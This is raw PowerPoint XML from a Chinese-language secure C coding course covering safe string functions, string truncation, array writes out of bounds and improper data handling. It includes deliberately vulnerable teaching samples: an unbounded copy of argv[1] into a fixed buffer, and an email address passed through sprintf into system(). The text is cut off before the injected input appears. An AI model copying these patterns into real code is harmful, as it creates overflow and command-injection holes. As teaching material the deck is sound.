              <a:t>代替 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代替 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>gets()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代替 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>当目标字符数组的长度不足以容纳一个字符串的内容时，就会发生字符串截断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串截断会丢失数据，有时也会导致软件漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2871039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latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、数组写入越界</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2058988"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 2.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 3.   char buff[128];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 4.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char *arg1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 5.   while (arg1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>] != '\0' ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 6.     buff[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>] = arg1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 7.     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 8.   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 9.   buff[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>10.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>("buff = %s\n", buff);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693738" lvl="2" indent="-241300" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>11. }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438276" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="2514600"/>
            <a:ext cx="3951288" cy="1601788"/>
          </a:xfrm>
          <a:prstGeom prst="verticalScroll">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:latin typeface="Monotype Corsiva" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:latin typeface="Monotype Corsiva" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:latin typeface="Monotype Corsiva" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格字符事实际上就是字符数组，因此完全有可能在不调用任何函数的情况下做了不安全的字符串操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Monotype Corsiva"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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3268620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8276"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="438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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、不恰当的数据处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>应用程序输入一个用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>地址，并把地址写入缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Viega</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 03]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(buffer,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>   "/bin/mail %s &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/email",</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>调用执行缓冲区中的数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>当用户输入下列格式的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>地址的时候，就会出现风险</a:t>
            </a:r>
            <a:r>
